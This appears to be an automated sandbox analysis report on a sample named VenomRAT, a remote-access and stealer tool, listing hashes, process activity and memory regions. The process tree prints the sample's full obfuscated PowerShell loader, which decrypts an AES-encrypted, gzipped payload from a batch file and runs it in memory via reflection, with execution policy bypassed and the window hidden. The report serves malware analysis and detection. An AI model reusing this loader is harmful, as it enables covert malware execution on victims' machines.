Analysis
-
max time kernel
50s -
max time network
23s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
15-04-2024 15:53
Behavioral task
behavioral1
Sample
VenomRAT v6.0.3/Client.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
VenomRAT v6.0.3/Client.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral3
Sample
VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
Resource
win7-20240221-en
General
-
Target
VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
-
Size
26.1MB
-
MD5
a8776c9984c7b6c4f18bf0505ca939b5
-
SHA1
e23a41b6f03f11d3b6a64d5645fa102f373bd292
-
SHA256
5dbb0f9df5fc34b49f0e284afe9037206c29dd8e50f0adbbcca785dcca89592e
-
SHA512
9ebb8d42d1649cb2b3e97bd703d5daa4b1a87f21949c279335f5b0ee834ef185be473e23f82f0562a0f22c1e54675259113c6555976aee5b5def2087b34a8398
-
SSDEEP
786432:/h9/AxUNfm9O7HYazcKB9rZsiqS+r+/hGykCCU1:/h9YxUNpTYGRQGhGykCC
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
Venom RAT + HVNC + Stealer + Grabber.exepid process 2652 Venom RAT + HVNC + Stealer + Grabber.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2480 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2480 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
Venom RAT + HVNC + Stealer + Grabber.exeVenom RAT + HVNC + Stealer + Grabber.execmd.exedescription pid process target process PID 2508 wrote to memory of 2520 2508 Venom RAT + HVNC + Stealer + Grabber.exe cmd.exe PID 2508 wrote to memory of 2520 2508 Venom RAT + HVNC + Stealer + Grabber.exe cmd.exe PID 2508 wrote to memory of 2520 2508 Venom RAT + HVNC + Stealer + Grabber.exe cmd.exe PID 2508 wrote to memory of 2652 2508 Venom RAT + HVNC + Stealer + Grabber.exe Venom RAT + HVNC + Stealer + Grabber.exe PID 2508 wrote to memory of 2652 2508 Venom RAT + HVNC + Stealer + Grabber.exe Venom RAT + HVNC + Stealer + Grabber.exe PID 2508 wrote to memory of 2652 2508 Venom RAT + HVNC + Stealer + Grabber.exe Venom RAT + HVNC + Stealer + Grabber.exe PID 2652 wrote to memory of 2724 2652 Venom RAT + HVNC + Stealer + Grabber.exe WerFault.exe PID 2652 wrote to memory of 2724 2652 Venom RAT + HVNC + Stealer + Grabber.exe WerFault.exe PID 2652 wrote to memory of 2724 2652 Venom RAT + HVNC + Stealer + Grabber.exe WerFault.exe PID 2520 wrote to memory of 2448 2520 cmd.exe cmd.exe PID 2520 wrote to memory of 2448 2520 cmd.exe cmd.exe PID 2520 wrote to memory of 2448 2520 cmd.exe cmd.exe PID 2520 wrote to memory of 2480 2520 cmd.exe powershell.exe PID 2520 wrote to memory of 2480 2520 cmd.exe powershell.exe PID 2520 wrote to memory of 2480 2520 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2652 -s 5323⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exeFilesize
14.2MB
MD53b3a304c6fc7a3a1d9390d7cbff56634
SHA1e8bd5244e6362968f5017680da33f1e90ae63dd7
SHA2567331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58
SHA5127f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5
-
C:\Users\Admin\AppData\Roaming\Venom.batFilesize
11.9MB
MD504fd97b8a5d2132eee84f856ee0fa938
SHA10d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a
SHA256bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49
SHA512e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778
-
memory/2480-31-0x0000000002540000-0x00000000025C0000-memory.dmpFilesize
512KB
-
memory/2480-33-0x000007FEEF370000-0x000007FEEFD0D000-memory.dmpFilesize
9.6MB
-
memory/2480-37-0x0000000002540000-0x00000000025C0000-memory.dmpFilesize
512KB
-
memory/2480-36-0x0000000002540000-0x00000000025C0000-memory.dmpFilesize
512KB
-
memory/2480-35-0x0000000002540000-0x00000000025C0000-memory.dmpFilesize
512KB
-
memory/2480-34-0x0000000002540000-0x00000000025C0000-memory.dmpFilesize
512KB
-
memory/2480-24-0x000000001B240000-0x000000001B522000-memory.dmpFilesize
2.9MB
-
memory/2480-25-0x000007FEEF370000-0x000007FEEFD0D000-memory.dmpFilesize
9.6MB
-
memory/2480-26-0x0000000002320000-0x0000000002328000-memory.dmpFilesize
32KB
-
memory/2480-27-0x000007FEEF370000-0x000007FEEFD0D000-memory.dmpFilesize
9.6MB
-
memory/2480-28-0x0000000002540000-0x00000000025C0000-memory.dmpFilesize
512KB
-
memory/2480-29-0x0000000002540000-0x00000000025C0000-memory.dmpFilesize
512KB
-
memory/2480-30-0x0000000002540000-0x00000000025C0000-memory.dmpFilesize
512KB
-
memory/2508-18-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmpFilesize
9.9MB
-
memory/2508-0-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmpFilesize
9.9MB
-
memory/2508-2-0x000000001CAD0000-0x000000001CB50000-memory.dmpFilesize
512KB
-
memory/2508-1-0x0000000001340000-0x0000000002D6A000-memory.dmpFilesize
26.2MB
-
memory/2652-32-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmpFilesize
9.9MB
-
memory/2652-19-0x0000000000330000-0x0000000001164000-memory.dmpFilesize
14.2MB
-
memory/2652-17-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmpFilesize
9.9MB